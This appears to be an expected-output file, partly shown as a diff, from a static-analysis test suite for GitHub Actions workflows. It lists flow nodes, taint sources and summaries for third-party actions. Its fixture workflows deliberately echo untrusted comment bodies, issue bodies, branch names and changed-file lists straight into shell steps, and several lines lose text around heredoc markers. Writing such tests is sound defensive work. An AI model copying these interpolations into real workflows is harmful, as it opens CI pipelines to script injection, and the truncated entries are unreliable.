.github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -dfNodes -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -argumentNodes -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -usesIds -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | -nodeLocations -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:9:5:33:14 | .github/workflows/multiline.yml@9:5:33:14 | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:9:15:6 | .github/workflows/multiline.yml@11:9:15:6 | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:9:33:14 | .github/workflows/multiline.yml@30:9:33:14 | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | -scopes -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/test.yml:1:1:40:53 | on: push | -sources -| ahmadnassri/action-changed-files | * | output.files | PR changed files | manual | -| ahmadnassri/action-changed-files | * | output.json | PR changed files | manual | -| amannn/action-semantic-pull-request | * | output.error_message | PR title | manual | -| cypress-io/github-action | * | env.GH_BRANCH | PR branch | manual | -| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | manual | -| dorny/paths-filter | * | output.changes | PR changed files | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | manual | -| googlecloudplatform/magic-modules | * | output.changed-files | PR changed files | manual | -| jitterbit/get-changed-files | * | output.added | PR changed files | manual | -| jitterbit/get-changed-files | * | output.added_modified | PR changed files | manual | -| jitterbit/get-changed-files | * | output.all | PR changed files | manual | -| jitterbit/get-changed-files | * | output.deleted | PR changed files | manual | -| jitterbit/get-changed-files | * | output.modified | PR changed files | manual | -| jitterbit/get-changed-files | * | output.removed | PR changed files | manual | -| jitterbit/get-changed-files | * | output.renamed | PR changed files | manual | -| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | manual | -| marocchino/on_artifact | * | output.* | Downloaded artifact | manual | -| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | Changed files | manual | -| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | manual | -| tj-actions/branch-names | * | output.current_branch | PR current branch | manual | -| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | manual | -| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | manual | -| tj-actions/changed-files | * | output.added_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.changed_keys | PR changed files | manual | -| tj-actions/changed-files | * | output.copied_files | PR changed files | manual | -| tj-actions/changed-files | * | output.deleted_files | PR changed files | manual | -| tj-actions/changed-files | * | output.modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.modified_keys | PR changed files | manual | -| tj-actions/changed-files | * | output.other_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | manual | -| tj-actions/changed-files | * | output.other_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.renamed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.type_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.unknown_files | PR changed files | manual | -| tj-actions/changed-files | * | output.unmerged_files | PR changed files | manual | -| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | manual | -| trilom/file-changes-action | * | output.files | PR changed files | manual | -| trilom/file-changes-action | * | output.files_added | PR changed files | manual | -| trilom/file-changes-action | * | output.files_modified | PR changed files | manual | -| trilom/file-changes-action | * | output.files_removed | PR changed files | manual | -| tzkhan/pr-update-action | * | output.headMatch | | manual | -| xt0rted/slash-command-action | * | output.command-arguments | | manual | -summaries -| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | -| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | -| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | -| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | -| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | -| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | -| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | -| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | -| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | -| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | -| aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | -| bobheadxi/deployments | * | input.env | output.env | taint | manual | -| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | -| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | -| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | -| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | -| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | -| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | -| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | -| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | -| drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | -| drawpile/drawpile | * | input.path | output.path | taint | manual | -| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | -| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | -| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | -| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | -| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | -| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | -| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | -| getsentry/action-release | * | input.version | output.version | taint | manual | -| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | -| github/codeql-action | * | input.output | output.sarif-output | taint | manual | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | -| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | -| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | -| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | -| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | -| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | -| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | -| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | -| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | -| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | -| hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | -| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | -| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | -| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | -| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | -| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | -| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | -| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | -| linkerd/linkerd2 | * | input.component | output.image | taint | manual | -| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | -| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | -| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | -| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | -| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | -| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | -| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | -| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | -| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | -| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | -| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | -| novuhq/novu | * | input.docker_name | output.image | taint | manual | -| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | -| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | -| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | -| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | -| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | -| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | -| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | -| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | -| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | -| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | -| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | -| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | -| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | -calls -| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | -needs -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -testNormalizeExpr -| foo['bar'] == baz | foo.bar == baz | -| github.event.pull_request.user["login"] | github.event.pull_request.user.login | -| github.event.pull_request.user['login'] | github.event.pull_request.user.login | -| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | -writeToGitHubEnv -| id1 | $(> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | @@ -295,37 +306,51 @@ cfgNodes | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | dfNodes | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:10:9:13:6 | 